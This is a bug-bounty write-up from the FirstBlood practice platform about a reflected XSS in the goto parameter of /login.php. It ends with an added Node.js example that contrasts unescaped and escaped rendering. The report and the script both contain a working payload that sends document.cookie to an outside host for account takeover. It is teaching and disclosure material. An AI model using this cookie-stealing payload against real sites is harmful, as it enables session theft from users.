FirstBlood-#477 — Reflected XSS on /login.php via goto parameter leads to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, 0xblackbird reported:
Hello! I've found that the exact same issue I reported before is still there and remains unpatched. Below are the steps to reproduce the issue.
Proof of concept URL:
Account Takeover: https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz%22%3E%3Cx/autofocus/contenteditable/onfocusin=%22document.location=%27//0xblackbird.github.io/home?cookies=%27%2Bdocument.cookie%22%3E
Steps to reproduce:
- As you said in your methodology, parameters often get reused, which is the case here. The goto parameter gets reused: when we view the source code of the following web page https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz, we can see that appending the goto parameter to the URL adds a new hidden input field.
- We can also see that the value of the goto parameter gets reflected and that the most common special characters (such as >) do not get handled safely. This indicates that we can break out of the tag easily and inject our own. Visit https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz"x> and view the source code of the web page.
- Knowing that we can inject our own HTML tags, attributes and event handlers, we can easily craft a little payload that bypasses some of the basic filters:
- As mentioned in the title of this report, we can escalate this to account takeover by stealing the user's cookies. To do so, we just have to adjust our payload a bit:
xyz"><x/autofocus/contenteditable/onfocusin="document.location='//0xblackbird.github.io/home?cookies='+document.cookie"> (make sure to URL-encode the payload to avoid any errors). After getting redirected, we can see our cookies end up in the cookie parameter, which the attacker can access by reading, for example, server logs.
Thanks! Have a nice day!
FirstBlood ID: 26
Vulnerability Type: Reflected XSS
The developers believed they had fixed the reflection of ?goto= into an input tag on login.php while addressing a similar bug (ID 39), but because this endpoint runs legacy code, their fix was never applied here and the XSS remained.
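To make both the reporter's reproduction steps and the developer note concrete, the following Node.js script is an added example, not code from FirstBlood or from the reporter. It extracts the goto value from the PoC URL above the way a server would, renders it into a hidden input first with plain string concatenation (the assumed shape of the legacy login.php markup) and then through an attribute-context encoder, and counts tag openings to show that the payload opens a second tag only in the unencoded version. The hidden-field markup and the helper names are assumptions.

```javascript
// Added example, not code from FirstBlood or the reporter. Models the
// reflection of ?goto= into a hidden input on login.php. The exact markup of
// the hidden field is an assumption; the PoC URL is the one from the report.

const POC_URL =
  'https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=' +
  'xyz%22%3E%3Cx/autofocus/contenteditable/onfocusin=%22document.location=' +
  '%27//0xblackbird.github.io/home?cookies=%27%2Bdocument.cookie%22%3E';

// Extract and percent-decode the goto value the way the server sees it.
function gotoFromUrl(url) {
  return new URL(url).searchParams.get('goto') || '';
}

// Vulnerable pattern (assumed shape of the legacy login.php code): the raw
// query value is concatenated into an attribute value.
function renderGotoFieldVulnerable(gotoParam) {
  return '<input type="hidden" name="goto" value="' + gotoParam + '">';
}

// Encoder for HTML attribute context. The quotes are what matter inside
// value="..."; <, >, & are encoded too so the same helper is safe in text
// context and can be the one helper every template uses.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: identical markup, encoded value.
function renderGotoFieldSafe(gotoParam) {
  return '<input type="hidden" name="goto" value="' + escapeHtml(gotoParam) + '">';
}

// Crude breakout detector: count tag openings in the rendered fragment.
// A properly encoded reflection yields exactly one (the <input> itself).
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// True when the injected <x ...> tag with its onfocusin handler made it
// into the markup instead of staying inert inside value="".
function hasInjectedHandler(html) {
  return /<x[\s/][^>]*onfocusin=/.test(html);
}

const payload = gotoFromUrl(POC_URL);
const vulnerable = renderGotoFieldVulnerable(payload);
const safe = renderGotoFieldSafe(payload);
console.log('decoded goto :', payload);
console.log('vulnerable   :', vulnerable, '->', countTags(vulnerable), 'tags');
console.log('hardened     :', safe, '->', countTags(safe), 'tag');
```

The single escapeHtml helper is the point of the developer note: an encoding fix applied in one template does nothing for a legacy endpoint that still concatenates, so every reflection of user input should go through one shared helper rather than per-page fixes. One further caveat for the account-takeover step: document.cookie only exposes cookies without the HttpOnly flag, so a session cookie set with HttpOnly would not be exfiltrated by this payload, although the XSS itself would remain exploitable in other ways.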